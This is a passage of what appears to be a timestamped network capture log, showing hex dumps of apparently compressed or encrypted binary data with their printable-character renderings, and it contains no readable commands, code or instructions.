a2 2d 2f 25 3b 08 69 5b 91 83 d6 cf 64 cf 71 ce aa 72 d0 48 66 47 8d a2 69 0b 8e
                                                                                                                                                        Data Ascii: J{!fVLt|ve64$tZeElEb,.LxTm$ij=uK?V;g*|d|~Zlr24X3?}sc]x6bk+(<;h&t);^H'+0jU4Dv.-/%;i[dqrHfGi
                                                                                                                                                        2021-12-28 02:24:06 UTC2407INData Raw: 36 c3 06 c3 c8 49 8f 7f 9e ec 19 c9 d1 0f 2a d5 59 fb 2a c6 dd 6a b1 63 f6 38 cb d4 68 9b da 3d a0 d0 45 c6 d1 89 33 0e ba 64 29 36 cb c0 c3 e8 8e ff 2c df 64 39 1d 83 ba c8 ee ef e1 6a 1a 12 ec 71 90 bf d2 92 fa 0b 09 17 25 da 7f a9 a2 47 3e 99 ce 38 a9 ad f8 d1 60 06 ce 74 ab 80 22 ea 74 5f b9 11 8d 0f 81 24 06 50 af e7 8f d8 c3 89 b2 bb 2b 20 44 21 e0 ad 22 03 68 19 c0 97 ed 7b a4 a3 01 4b 69 be 8c 52 05 de 3a 89 8b b7 c2 3f 40 fd 00 2c cc ce b6 b0 85 ec 1c 33 be c2 48 84 fd c5 87 6b 20 db e5 12 37 8f 3c bb 01 ff 5c e9 7c 3f 34 43 9f 69 b7 4e 78 83 b3 13 46 93 53 4a 72 91 67 31 19 d6 5e d8 a7 02 15 dd 61 e9 cc 3d b2 f4 36 03 42 91 19 d3 b7 57 44 61 7e 91 36 35 5c 63 17 bc 52 7f 4e e2 cf 56 e8 91 c6 88 4a b7 5e aa 08 4f f4 a3 91 14 f6 7a 64 72 7f 83 e0
                                                                                                                                                        Data Ascii: 6I*Y*jc8h=E3d)6,d9jq%G>8`t"t_$P+ D!"h{KiR:?@,3Hk 7<\|?4CiNxFSJrg1^a=6BWDa~65\cRNVJ^Ozdr
                                                                                                                                                        2021-12-28 02:24:06 UTC2408INData Raw: 01 4d b6 19 46 11 8b e5 ca f2 d8 de 00 fe fc 78 e0 d2 60 5e 65 90 ec 1a dd 75 f7 a4 b5 0a 61 20 d1 7f f3 93 99 68 c7 59 2d c3 78 8c c2 81 70 89 9b 78 fd a7 a2 26 2c 75 ad d2 8d 40 c7 1e f2 d5 b9 70 c6 76 66 c8 63 36 3e 32 0a 02 1d 2a 49 a6 df 8b 04 77 08 46 94 e3 ff 59 5f 88 e5 06 1a f6 26 59 21 13 ff 32 f2 be 3c 14 af df 38 0a 9c 4e bc 04 7f 98 c2 8d 97 2d d3 a5 b1 77 96 9b bf 14 71 55 16 68 eb 1a 3d 6e 30 99 cb 9d 96 fd 9f 6c 9a 07 ab 30 bd 8f 29 d9 c9 c8 14 3e 46 99 a3 79 d0 c9 c2 76 c3 d4 04 33 15 b6 33 70 a5 85 cd 3d 2f 54 71 2d 7e 2a 9a c5 42 cb 3c 51 3c 4d 40 c5 9d c0 fc c2 ee f1 21 e9 45 59 e5 90 55 bc c0 1e d1 6b ee 78 41 14 44 08 ba 25 8a a7 4b 3a 30 35 4e 81 00 83 9c 6d 38 99 8e f2 d2 c5 be 68 75 43 a2 71 c6 92 37 a2 be 29 02 04 59 63 2b 8d db
                                                                                                                                                        Data Ascii: MFx`^eua hY-xpx&,u@pvfc6>2*IwFY_&Y!2<8N-wqUh=n0l0)>Fyv33p=/Tq-~*B<Q<M@!EYUkxAD%K:05Nm8huCq7)Yc+
                                                                                                                                                        2021-12-28 02:24:06 UTC2409INData Raw: 2e ef 71 bc 98 33 79 aa 02 70 84 3a a2 e9 ba 9b b8 13 64 0a 6c c5 f2 59 a5 3b 5e c7 3f e2 40 c7 ab f1 35 19 d6 05 4a 84 6a dd ef b0 85 08 de 10 62 f1 b9 7f 8a 66 e5 d0 d7 c0 a3 15 21 38 db 8c 23 06 da 81 29 f0 4f f7 07 e6 1e 13 0b 83 06 ec d8 31 2d d8 ff d2 d5 9d c2 8e 07 fa f3 a5 0f dd a8 4b b3 32 8b b9 e3 db 57 50 56 3c 36 05 da 9b 06 57 12 23 1a 08 fb 9a 5f e0 a3 6a 1e ac ad ea 7d 61 06 64 ae f2 fd 36 c7 9a 6b 77 43 eb bd 79 e9 48 62 4f 4a 07 20 73 ea 85 4d 38 67 83 7e 56 0b dd 23 81 54 3c 7c e2 61 0e 98 28 44 9d 03 cf 43 34 a1 01 ae 4e f0 01 9b 67 9b 5a 64 73 d5 4f fb 00 26 c0 12 b7 14 1c 8a 19 10 2f 79 37 31 8b b9 79 78 df b0 2e 18 55 b3 80 28 0d b9 68 f0 41 c3 e5 23 92 c7 24 be 61 5c 7b 33 e6 4f 1b d2 b4 20 65 65 28 27 f5 70 42 9a 19 ce 05 06 ad f4
                                                                                                                                                        Data Ascii: .q3yp:dlY;^?@5Jjbf!8#)O1-K2WPV<6W#_j}ad6kwCyHbOJ sM8g~V#T<|a(DC4NgZdsO&/y71yx.U(hA#$a\{3O ee('pB
                                                                                                                                                        2021-12-28 02:24:06 UTC2411INData Raw: 76 3d 90 0c f7 95 81 58 99 c4 fd f7 a4 a9 4c 1f 4b ae dc 98 bc 19 91 82 eb 54 63 2c ae 60 e7 2a da 7d fb 34 44 8b 6a 26 20 b3 a7 78 82 35 e0 3e cf 9d ee 8c ad 99 49 fd 22 b7 af f8 f9 61 c7 15 34 50 fb 90 be 18 fd 65 47 a8 fd dc 42 cb a9 53 6c f7 cf cb a8 5f 48 f9 ac 37 7c 86 3b fb ad ed b7 f3 c8 22 c9 c6 8b 42 26 2f 02 0e 83 1c 1f 99 23 38 bc 06 89 c6 a1 ef 2c f3 80 55 c5 4b 25 04 1d ca 31 fd 2d 06 aa ab 80 dd 2f 5f c0 d9 70 18 e0 89 dd 69 05 49 4f c4 e1 e7 3c bb 16 2f 97 66 6f e4 65 8b 09 55 29 77 90 0e 87 83 71 d2 20 ff 24 22 46 63 64 b0 75 db 49 eb 24 bd c6 44 8d 9c 06 6e 72 f4 4d 4f 59 1a 3f ca 5b c6 13 97 31 53 3e 62 26 db 42 de b6 3b a5 e7 09 0a 6d d8 03 0e d1 c6 87 5c 45 cf 9f 85 9d 8e 40 a1 fe 0f ae ee bc 99 e5 36 28 5c 3d 1d 5c 49 3e 98 45 c3 38
                                                                                                                                                        Data Ascii: v=XLKTc,`*}4Dj& x5>I"a4PeGBSl_H7|;"B&/#8,UK%1-/_piIO</foeU)wq $"FcduI$DnrMOY?[1S>b&B;m\E@6(\=\I>E8
                                                                                                                                                        2021-12-28 02:24:06 UTC2412INData Raw: 52 e0 66 a4 58 4d 21 a6 91 0c ef 5b c2 f4 bc 3b d6 87 93 b7 1a b6 dc 58 86 5b 14 46 b7 20 15 01 b9 df 80 9c 66 6e b7 1f 17 94 74 08 8f 20 01 01 76 1b 01 79 d0 89 3a 26 39 30 a2 4e 9c fe b5 03 73 57 33 58 3e fd 9b 06 84 c9 8a f7 db 40 98 7b d3 01 d6 bc 78 1c 6a 2f 53 7d e9 78 74 69 94 fa b5 55 df 07 e1 9b f8 e0 7b 2c 42 48 d6 d8 fc f3 fa ba d4 1c cd 17 34 73 e0 e8 8c 4c 5f 77 4a 94 4b c7 eb aa c0 01 28 41 be 27 d4 50 ab 3e d8 a0 84 b5 df 00 73 5e 15 b8 4b 0e 87 96 97 1e 47 40 22 37 f5 8f 20 76 1e 28 2c 4f de a6 fb c0 80 ae db 65 49 b2 96 c8 c9 99 aa c4 32 45 8d 19 d4 f5 7a 2c c3 ce b2 9d 8c db 9d 45 ac 88 b4 6a d3 bf c6 00 fe 1d a7 03 d3 54 9a 19 08 6d 9b f9 93 3f 4e 72 0d 0b 47 51 44 3e 7a 0c 25 fe 5d 85 84 76 6a c6 4c 87 0e b8 2d a6 dc 3a 3a aa c4 a3 03
                                                                                                                                                        Data Ascii: RfXM![;X[F fnt vy:&90NsW3X>@{xj/S}xtiU{,BH4sL_wJK(A'P>s^KG@"7 v(,OeI2Ez,EjTm?NrGQD>z%]vjL-::
                                                                                                                                                        2021-12-28 02:24:06 UTC2413INData Raw: 4e 3a 5f d3 97 2c 83 5a 26 61 c9 cc 24 44 0a f1 ab e3 25 e5 6c b6 eb f2 5d 5d 80 fb 68 70 80 89 c6 60 a4 8e d9 70 82 19 3c 23 47 f7 23 51 20 96 c3 96 a5 2c ca 94 34 15 be 73 f7 0b d8 be d4 0f 17 52 5d 6a 68 5d a2 c0 b4 b9 88 6a 4e 24 a9 8d 58 6a 19 4c 9c 9c 61 7b a2 4c 57 83 bc de 6e 42 a5 94 c1 d4 22 d7 43 a9 1d 34 4a 04 a9 4f 23 cb a0 f0 a4 51 be 92 ba 0a 4e b3 ea 3d e3 36 34 85 b3 c8 7e ba 09 80 2c e5 2d 61 56 17 c7 a7 0c b1 d7 8a 5f e4 fc 03 cd 81 70 b9 c6 d8 4b 39 31 e8 ed 91 ee 7c 84 9d 4f b0 41 2d 7e a9 a1 26 f7 3b a2 50 c8 4a 39 4c 9c 18 bd 94 9b 22 fb 4b b5 ce 58 66 b9 75 94 54 52 bc 21 bc cb d9 f9 8f 30 e2 c9 23 c2 52 c1 0b fc 2d 7f 74 00 af c4 37 83 fc 28 80 4f 1a ee 49 35 a6 bf 52 08 c4 de 9a 15 3b 81 9b 7a 3f 72 d7 33 91 56 91 ca da 1f a8 e5
                                                                                                                                                        Data Ascii: N:_,Z&a$D%l]]hp`p<#G#Q ,4sR]jh]jN$XjLa{LWnB"C4JO#QN=64~,-aV_pK91|OA-~&;PJ9L"KXfuTR!0#R-t7(OI5R;z?r3V
                                                                                                                                                        2021-12-28 02:24:06 UTC2415INData Raw: 23 83 80 3a 11 2a 22 00 f5 d4 d3 03 05 06 41 be f7 db d8 e8 34 a8 09 3a 9f 4c 7a c7 05 02 0c 1b 69 73 81 9c 8e e7 d6 d2 7f 3b 09 a6 23 9e 0c 66 5b 86 f9 2b 5f ac 1b 73 5a 02 93 4f 3c 4e 62 cf b2 48 fc 6c 06 93 ae c0 21 2a bf 4d 84 43 8e 0c 7d 3b e1 bd cb 98 64 32 15 3c 0a f4 31 f0 c0 1b 75 46 b1 cf ef 1a a4 01 c2 24 2f 56 85 7e 98 97 89 f3 a9 ce 87 73 5d 91 ec f6 7f 22 da e1 98 75 eb 91 b3 93 ce 46 28 7d e7 26 9a e5 4b f7 73 be 88 67 22 9a e8 c3 7b e6 37 7a 6e 40 6f 21 ee 0f d9 15 df 02 a7 e3 94 01 06 3e 3a 43 98 05 bd 4f cc 4d 07 9f 1d 80 3a d7 2c 5f 67 b6 62 70 78 8b 5d 92 2c fc 63 10 c3 39 57 b8 a4 9b aa 9d 2b 41 7a e7 da 65 82 76 00 fe 7f b0 ac 1a 5c 8a 22 67 8c fe 68 9e 9e 1f 3e 7e 4a 9a c6 ef 09 87 b6 c0 27 e2 61 89 f4 30 8b da b1 9f a3 5a 98 94 36
                                                                                                                                                        Data Ascii: #:*"A4:Lzis;#f[+_sZO<NbHl!*MC};d2<1uF$/V~s]"uF(}&Ksg"{7zn@o!>:COM:,_gbpx],c9W+Azev\"gh>~J'a0Z6
                                                                                                                                                        2021-12-28 02:24:06 UTC2416INData Raw: 0b e7 11 9e 6c e6 db 92 9a 7f 62 d5 fc 12 83 50 64 24 9f 14 9f e0 09 fe fb 7c 20 05 cc 91 63 41 a9 b5 4d 10 a3 90 4d 2a 39 f9 3c 8a 28 3e a9 04 84 78 9e b2 48 92 0f f5 dd 74 12 72 4e 0d bb 18 4d ac 29 d2 15 c9 94 8b 6c 65 63 f3 70 a5 d5 2a b2 36 d8 c2 0c 0b 8f dc f2 90 1d e1 57 27 21 9a 30 38 5d 37 4e b1 7b ae 41 26 b7 c6 d7 e8 4f 53 63 d4 ca a7 96 d6 71 0c 23 e2 26 86 c1 11 89 32 bc 01 0a 4d 5d 76 ca c1 31 01 44 db 5f 70 86 93 37 7e b3 6c cf 67 80 8b 8f cf b1 4d a3 38 0e bf 9d dc ca 30 1c 17 1b 41 fc c0 17 a8 36 72 5e 75 44 34 75 8b 08 ba c0 11 bf bb e7 e0 4e cc 41 ca 04 eb d8 9d d6 b6 c0 a7 bb b0 c3 bd 05 34 c5 ee ae 17 78 12 35 f3 97 3e 4a 08 da 1b 3a 7b 6a 7a e5 6d ec 3d c0 e1 1e 35 0d e6 db 0e 69 48 0d 95 b2 31 53 91 e1 22 e0 4f dd dc 37 ea 9f 51 3a
                                                                                                                                                        Data Ascii: lbPd$| cAMM*9<(>xHtrNM)lecp*6W'!08]7N{A&OScq#&2M]v1D_p7~lgM80A6r^uD4uNA4x5>J:{jzm=5iH1S"O7Q:
                                                                                                                                                        2021-12-28 02:24:06 UTC2417INData Raw: 5b 90 f2 00 f9 a0 00 16 65 d2 ae b8 62 fd fa 55 1a 63 27 b7 16 bb b6 4d 36 cd 27 d3 ae 89 b2 29 77 47 e4 a8 19 04 e8 63 7e f5 21 1c 39 33 e7 96 0f 01 4f 90 b1 43 44 38 d3 6b ae 0f 2f ed 82 77 5c c5 4d 9c 12 8e fc 4b 24 33 df a4 dd 83 4b aa f4 a6 15 48 af 48 9d 84 f9 e6 29 b2 38 7d 77 39 16 67 5a f2 d0 70 20 38 30 84 2e 6d 3e 9a 46 56 b9 9c ed f0 f9 d8 01 68 84 0c e7 ab 3a a1 c2 99 03 87 47 88 e2 d6 de 19 f1 8a 41 f0 5a 05 82 70 30 22 de 8c 8c 43 82 25 e1 6b fb 4e b4 69 30 45 8a 5a 7f 33 0e 54 0f 36 8e 89 27 17 45 ca de c5 c9 c9 f9 75 12 97 02 5d c8 b4 f1 51 69 31 f1 d0 84 1b 44 cb c3 dc 33 92 37 84 e8 ba 59 57 39 b4 09 8c b8 99 6a 89 f0 f4 16 d7 de 81 5b 62 a0 3e 33 b9 78 7e 99 22 8c 57 bb 76 7b 04 2f c1 5f 8f 4a 96 0a f8 31 d3 e8 f6 0f a1 4c b9 a0 36 06
                                                                                                                                                        Data Ascii: [ebUc'M6')wGc~!93OCD8k/w\MK$3KHH)8}w9gZp 80.m>FVh:GAZp0"C%kNi0EZ3T6'Eu]Qi1D37YW9j[b>3x~"Wv{/_J1L6
                                                                                                                                                        2021-12-28 02:24:06 UTC2419INData Raw: b3 ac a6 a9 c7 00 35 d5 3c 53 43 e2 9f 7d 52 61 dc d4 13 97 f3 f7 27 8e e4 29 ea 25 45 ba df 69 23 e5 84 84 13 af c5 4f 0a 77 fe ba 4c d4 87 40 3e 91 c5 08 84 97 46 19 10 b4 83 c7 f0 80 06 db 3c ca 50 31 56 2d 80 64 08 64 4d ac 9b a2 f5 a8 25 78 37 7c e3 b1 38 1f 8e 0d 23 bc e0 07 ab 3f 98 67 ac d9 51 74 c7 04 9f 55 af 2f 3a 9b aa 9e c9 c1 64 2d 7b 9d 81 e8 25 55 6b 04 12 d0 c3 8f ae 5c 9a 98 d0 bb 3e 53 e3 05 2a a7 b0 b9 3a 70 db 9a 97 fb 5c 62 1c 71 ef 08 d0 38 a9 54 e4 db 1e 34 61 5e 10 fa ee 76 3e 54 3f dd 18 3f 57 1f 3c fe 2d 12 9b 54 f0 c2 84 9c 8c 88 5f f0 c2 88 0e 33 6f 74 8e db 72 db 34 73 93 89 df 09 38 68 e0 97 b0 ff 1c 49 22 e9 fe f9 c6 da 0a 18 cd 54 b1 69 c2 87 44 a5 b2 bc a6 5d e3 f7 54 b8 06 b3 2d 52 ee ad 6d e7 4d 53 0e 70 02 a9 c0 58 bf
                                                                                                                                                        Data Ascii: 5<SC}Ra')%Ei#OwL@>F<P1V-ddM%x7|8#?gQtU/:d-{%Uk\>S*:p\bq8T4a^v>T??W<-T_3otr4s8hI"TiD]T-RmMSpX
                                                                                                                                                        2021-12-28 02:24:06 UTC2420INData Raw: a6 33 96 c6 f0 7c 12 83 a7 5c 4d 46 2d 3d 22 5c ba f4 d8 97 fa 62 c8 a6 6a 51 86 bf 76 6e 42 49 88 9e 7e 74 ad 2a a3 5b b6 cf b7 70 9a 29 34 b8 48 ce 4b ff 87 f5 73 b9 a0 b5 f9 eb 6a ba 0e 23 39 0c e4 69 82 62 76 d7 37 b8 a1 c3 bb 21 77 f7 30 1f 09 59 08 be f1 af 95 0a 32 2b 57 a5 8f 9f f7 c4 95 76 2c bd b9 1d 66 f8 05 42 2e 30 07 8c 2b 5a bf d5 53 a1 fc d2 45 ad 41 db 68 ef 34 b1 85 4b 96 80 86 b4 f5 3d cc 15 aa 82 fe 18 26 5a e3 66 3b a7 a2 18 da a0 51 fe 96 6e c7 ef 23 3b 0a 4b 8e ca e0 67 85 d5 a8 30 a5 15 08 31 5b dc 50 ab 3b 56 7d 8d cf 1f c6 11 b9 27 84 8b 28 b1 f0 f4 13 91 df 1e ea f9 67 2a d8 1b 47 5c cf 0a 43 36 5f b1 8f 97 75 11 e4 3b 5a b8 01 d6 5a ab 43 52 26 b3 f7 8f 3e be 48 e2 27 b7 d8 e0 ee fe d8 62 1a 5e ef 53 f6 51 24 ef 36 9f 90 94 2a
                                                                                                                                                        Data Ascii: 3|\MF-="\bjQvnBI~t*[p)4HKsj#9ibv7!w0Y2+Wv,fB.0+ZSEAh4K=&Zf;Qn#;Kg01[P;V}'(g*G\C6_u;ZZCR&>H'b^SQ$6*
                                                                                                                                                        2021-12-28 02:24:06 UTC2421INData Raw: d1 9a cf 24 48 04 13 30 99 b1 be 2b f4 65 07 3c d1 84 d4 bb 31 ac fa 80 fc 90 87 1d fa 94 54 61 71 3a 84 b9 66 73 55 05 66 95 d4 2b c4 d4 ed 3f 16 88 aa 89 fd 50 cf 1c 4e 22 92 1c 0a 84 d1 6f 24 b7 80 cf 11 4a 7a 19 bd 1b a5 b5 e2 a2 9d a8 c4 a3 85 94 2c af cb 27 a5 ef 71 0d 9d 59 46 58 f5 b2 7c 5f 38 5d 22 4e ca da b3 25 cb e4 86 0f b5 93 a0 19 8f 75 1f 05 0d 40 6d a5 25 fc d5 31 e1 85 a8 78 87 ac cf 4d 1b 9c 1a 54 d3 f6 28 9e 68 08 0e 78 ab e1 f8 a2 51 35 64 0a be a2 66 8b b8 0b 30 00 25 b6 4f 8e 70 92 c3 02 22 44 c4 26 f9 9f 32 e9 60 42 9f 21 ea 38 53 ff ff 0f 7a 27 fd 64 05 cc c6 ce e3 cc 0a be fd 69 5e cc 14 5f 39 d7 94 1c d0 ae 33 40 ee d3 c1 a6 ef 3f 6b d1 05 ae 28 c7 2f 69 11 16 66 97 15 48 67 24 49 5f ca 37 a8 32 4b fa 7d 7a 87 42 5d 7c b9 a8 07
                                                                                                                                                        Data Ascii: $H0+e<1Taq:fsUf+?PN"o$Jz,'qYFX|_8]"N%u@m%1xMT(hxQ5df0%Op"D&2`B!8Sz'di^_93@?k(/ifHg$I_72K}zB]|
                                                                                                                                                        2021-12-28 02:24:06 UTC2423INData Raw: fd bb eb 21 4f cd c7 2c 78 1c da ba 14 3e 3f c1 ad 52 6f 46 ec 73 82 6f 02 0d 17 dc f1 bd 54 74 70 2e 91 18 10 84 83 17 96 64 f9 85 b4 34 4a dc 41 90 c0 bf d5 74 31 ff c4 fc f5 4b 5b 33 6e f0 10 a3 ff 75 ab 4f 1c 62 91 a6 fe 5c 86 69 75 3d c1 97 fd 62 d9 d7 9c 51 10 65 80 0f 95 1c 42 f9 b0 b1 79 4d 54 d6 0f af cb 97 9e 25 57 7c 24 dd 8b 96 21 79 45 de de d4 61 fd dd d4 c8 2f 49 18 aa 05 d5 7a eb 1f c8 eb 90 bc 61 9b 33 d9 d9 4f 6b a8 cf 05 f6 66 f5 38 74 69 d4 48 fb cb b5 ee 4a 0f 79 48 61 24 ba 64 6e 37 9f 44 2e ac f4 57 5f e7 7d be 02 bc f6 a4 12 55 ba 99 43 de 53 f6 80 02 ff 80 75 2c 68 94 bb be ee b4 0c 09 f6 b6 f3 02 91 93 03 ec d6 1f 63 56 5f 23 a4 9f 3a fb 20 32 de 05 fe a5 c3 01 59 10 1d 23 88 9f 71 e7 9f e3 b6 20 01 63 e1 c3 2a 60 25 c1 aa c1 d3
                                                                                                                                                        Data Ascii: !O,x>?RoFsoTtp.d4JAt1K[3nuOb\iu=bQeByMT%W|$!yEa/Iza3Okf8tiHJyHa$dn7D.W_}UCSu,hcV_#: 2Y#q c*`%
                                                                                                                                                        2021-12-28 02:24:06 UTC2424INData Raw: ac 9e 37 72 10 f8 75 da a8 8e 88 b9 33 b3 0d 8c 28 a6 61 a9 7a cb e3 84 93 69 38 20 f6 7f 69 c7 42 e8 31 ac 30 9a 55 75 05 cd 8c e2 8b 7c 4e 8e fc 92 5e 40 eb 16 1c 7b b2 2a 47 e1 15 b2 c3 1b 93 26 c9 d1 f0 6c 02 82 de 7d 6e 92 82 92 e4 2a f5 30 5a 2c da 44 b6 d0 84 01 48 51 8b 73 19 e3 96 73 d4 53 06 8f 5e 3d 5b 69 87 c3 a4 8d c6 e7 c8 9c ae 51 cb fb b3 f6 79 88 17 b6 7f 67 f4 3b 9c c4 7a 76 26 14 25 ce 55 50 6d f1 e8 76 a1 01 ef 5a bb 5d 53 0c 4c a2 23 2f ea 2d d8 2b d1 f1 49 06 8f ae 0e 74 d1 21 fe f1 c6 9b 09 d4 cf e7 b7 e0 5d 96 dd df c7 1a 3c c3 fa bf e5 3e b8 4d 5f 6d da c6 51 84 06 f2 0c 33 72 6e 2a f3 22 e2 36 f7 88 51 82 3d f4 26 56 50 4d 92 16 47 6f a4 e6 11 e2 7e 65 b8 d6 53 b8 97 70 f3 d6 a8 ee bf ed c0 ad 27 80 11 29 d8 e4 62 59 f5 c4 56 25
                                                                                                                                                        Data Ascii: 7ru3(azi8 iB10Uu|N^@{*G&l}n*0Z,DHQssS^=[iQyg;zv&%UPmvZ]SL#/-+It!]<>M_mQ3rn*"6Q=&VPMGo~eSp')bYV%
                                                                                                                                                        2021-12-28 02:24:06 UTC2425INData Raw: 83 7a e9 e3 6b b0 0e af 37 9d 80 85 3d d9 ea b6 df 96 9b 78 e7 84 22 f7 a9 3b 64 91 4e 0e a7 12 f8 f7 2b 2d 2d f6 20 44 83 3e 13 e6 44 5b 1b 25 79 be 50 d7 2d a1 ff 03 77 06 6e c1 f9 12 4d 1b a5 ad b1 87 eb 67 1d fd cb e4 ed 0b 34 28 11 2b 5d 31 ad 71 99 e2 35 30 e2 5a 61 72 93 a8 4c ce 89 64 04 bb 8b 27 82 65 0f 11 f0 85 90 26 18 c8 35 27 d4 b0 8e a2 58 d2 6c ec 8d 49 50 a0 0b 97 08 2b 31 44 3b 3c a2 ed a6 5a ea 3e 2f c1 4e 3a d5 bf 60 a6 5f d3 22 9c 40 f8 4c ce ee 39 cc 94 10 6c a3 05 98 08 25 0e c0 f8 13 b3 ee 87 96 a4 e0 36 8a 93 bf 02 06 3a ca ac 02 47 2c 05 4d c3 58 54 f7 85 ac ae 7d 7b d1 28 ad 24 64 69 e5 d5 9f c7 02 2c d3 71 80 90 3d d0 be 89 55 8b 5f d2 0a f9 ba 03 2e 12 d8 0f a7 cc 18 68 1f b7 a2 ab bd ca 09 ea 5f 20 da 80 f2 31 74 64 68 41 27
                                                                                                                                                        Data Ascii: zk7=x";dN+-- D>D[%yP-wnMg4(+]1q50ZarLd'e&5'XlIP+1D;<Z>/N:`_"@L9l%6:G,MXT}{($di,q=U_.h_ 1tdhA'
                                                                                                                                                        2021-12-28 02:24:06 UTC2427INData Raw: 99 cf 5b 98 4e 67 1a e5 30 c3 8b 9b 33 ab 30 69 b2 be 27 ec 45 72 b5 f8 55 b3 7a 50 16 2d bf df 0e a4 5a 50 ac d1 9b d6 88 cd 0d ab 21 b3 79 30 80 c0 6b 52 8b 0e de 51 f5 43 e3 d5 4f bb 09 99 56 fe a8 af ef d8 ee 04 8a 8d 9c 24 1d 56 54 37 9f 1f 09 da 2a 69 87 40 28 9e 8d d8 93 64 cd 99 12 bc 9e a2 e3 f3 67 2b be 4f 24 3a 40 5a 13 ef d7 65 a3 49 93 27 97 8f 1d 19 67 b3 f7 36 60 0b 94 6e 2e 38 0d 34 47 9c 33 34 34 99 1c c0 d6 3e 07 c0 3b 58 20 2c 0b 4c 30 56 9a cd d5 b7 76 f9 38 12 36 af 17 c2 cc d9 a2 a5 cd 5d 9c 19 dc ab af c3 bb eb 3c 23 94 d4 36 dd 29 df f5 58 0b 09 d1 c5 66 f2 89 5b c6 62 3d 92 ab bb 34 67 53 a0 d2 25 d5 2b 59 1d c7 1c a3 86 e7 c5 cd 60 16 a9 41 dc 04 24 45 c4 0a f5 5f 79 c7 1a 9b 56 81 53 35 da 72 f8 0f 53 0e f1 17 2e 60 cc a6 22 f7
                                                                                                                                                        Data Ascii: [Ng030i'ErUzP-ZP!y0kRQCOV$VT7*i@(dg+O$:@ZeI'g6`n.84G344>;X ,L0Vv86]<#6)Xf[b=4gS%+Y`A$E_yVS5rS.`"
                                                                                                                                                        2021-12-28 02:24:06 UTC2428INData Raw: ef 26 5a f0 09 81 6b 47 29 dc f5 0b 66 91 0a 68 4b b8 57 87 4d 52 83 39 04 08 0a f9 51 57 0c a1 72 1c 8c 70 00 ef 6a 44 23 26 30 08 da a2 1d 30 ac 3b 39 51 65 e7 96 93 54 a7 0b bb 26 be 10 ba 03 4e 39 e8 a0 92 55 e3 72 79 e1 cc 99 3e dd b4 22 34 db cd 61 cf 8e 61 30 0a a9 9f 1a ee 6c bb 66 65 ac 45 7a 30 02 42 90 02 c6 20 13 23 dd a5 e3 e2 97 4a 19 aa b2 32 83 2a b6 75 34 39 b7 a9 bb a3 b9 a1 e4 4a 7e 15 f0 e6 62 1d ed 0a 4e c9 fd 11 6e 3a 38 93 78 25 6d f6 04 de 04 64 8b c0 3e 59 f3 78 00 16 d1 04 ad 86 25 46 e4 40 91 e3 6a d6 59 85 bf ec cd 9c cb 5f 9c 16 9e ae d3 c5 32 11 7d 6f cd 8b dc b6 5f 5b ea da 88 dd d1 09 59 5d 7b b2 97 f7 5a 58 7b 04 99 ef f1 9a a2 96 f3 ad 19 5c 37 e6 65 22 92 7a 2c 7b c9 bd a6 7d 13 f0 84 d9 f4 1a 2e 0d 97 4a ae 3a a9 c7 26
                                                                                                                                                        Data Ascii: &ZkG)fhKWMR9QWrpjD#&00;9QeT&N9Ury>"4aa0lfeEz0B #J2*u49J~bNn:8x%md>Yx%F@jY_2}o_[Y]{ZX{\7e"z,{}.J:&
                                                                                                                                                        2021-12-28 02:24:06 UTC2429INData Raw: a3 43 f6 e7 1d a1 e1 0f f2 9e a9 fa c5 5a ee 2a af 05 72 94 eb 97 48 b7 a7 8e 2d 92 07 cc a6 1c 56 1e 8e 0f c9 85 59 f0 3a a8 4b 24 a6 8d 5b 37 22 d7 19 39 db 9a 0d b6 a0 6a 44 6d 48 10 cc df 9b f8 70 e8 4a bc 34 6f f7 74 11 74 54 15 a6 90 fe 50 c0 a3 bd 9b e5 cd d9 df 89 f0 69 00 72 10 23 02 4f de 9a a0 4e aa 32 26 5f 8d 7b 7c c6 17 25 a2 34 c8 73 5b ed 2a 21 5b 68 dc 60 a0 9c 5b 53 f5 47 67 ea 80 ee 29 9f f0 56 f5 37 06 7d 79 c4 14 47 ef 33 28 03 0c 96 d6 79 59 d6 93 7e ab ee e9 96 0a f9 55 59 ce 3e 1b b0 a6 3c 34 f7 ff 02 99 8d 15 7a 72 b0 84 c8 0c fe 17 27 b1 37 98 84 c4 41 09 b8 77 d8 ef c1 69 2f 6a 15 e1 68 f6 7b 2f 92 9f 13 25 93 5d 90 93 33 b3 86 b2 85 d8 14 9a 5f 8e cf 38 2c 1b 74 4c 57 58 bf d3 35 fa 82 2b f4 b5 84 b1 1c 95 8e 09 c0 42 3e 29 e7
                                                                                                                                                        Data Ascii: CZ*rH-VY:K$[7"9jDmHpJ4ottTPir#ON2&_{|%4s[*![h`[SGg)V7}yG3(yY~UY><4zr'7Awi/jh{/%]3_8,tLWX5+B>)
                                                                                                                                                        2021-12-28 02:24:06 UTC2431INData Raw: 1e 17 7e 1f a2 81 c7 f6 33 b5 ff e0 52 25 87 86 42 93 c0 41 ee 13 d5 9b aa fb b0 25 5e e1 e0 fd 59 14 86 c6 6c 50 7c 38 b8 6d 61 ec 55 14 cd 61 f3 11 08 51 f6 bd ad f4 3c 91 c4 9b 26 21 e0 cc d9 9f c4 fb 89 fa 31 1a be 0a 4a 5a 7b 54 6c be 66 37 8d 5e 26 b7 11 d6 48 5e 89 61 a5 a8 85 52 f7 f2 f4 26 0c 7b 6f 95 42 dd ee c9 31 2b 22 fc 51 d7 6b 08 ac d0 74 7f 6a 9a ce c0 87 8f 36 0c 31 9b 32 5b ce 45 e6 e4 11 78 ee ae e2 14 15 4b f0 22 25 9e f8 98 24 f0 e5 8f 56 bb 95 0e ea 30 02 e0 be ef c3 d6 66 54 8c 07 59 d8 d6 29 12 3c 0f b0 db 17 07 20 d1 d7 30 ef c9 e2 41 9e e7 86 72 22 fe c5 22 5d b7 c6 f7 88 1d 52 99 eb ff 76 0b f3 b0 57 6c 64 02 e5 92 62 5c 89 41 8b 43 db 0d f0 e3 1f e0 da 13 07 8c f3 db 3e e6 40 43 7f 10 4c 1e 60 6e 2a 44 7a 6a 0c 87 1c b4 4d a8
                                                                                                                                                        Data Ascii: ~3R%BA%^YlP|8maUaQ<&!1JZ{Tlf7^&H^aR&{oB1+"Qktj612[ExK"%$V0fTY)< 0Ar""]RvWldb\AC>@CL`n*DzjM
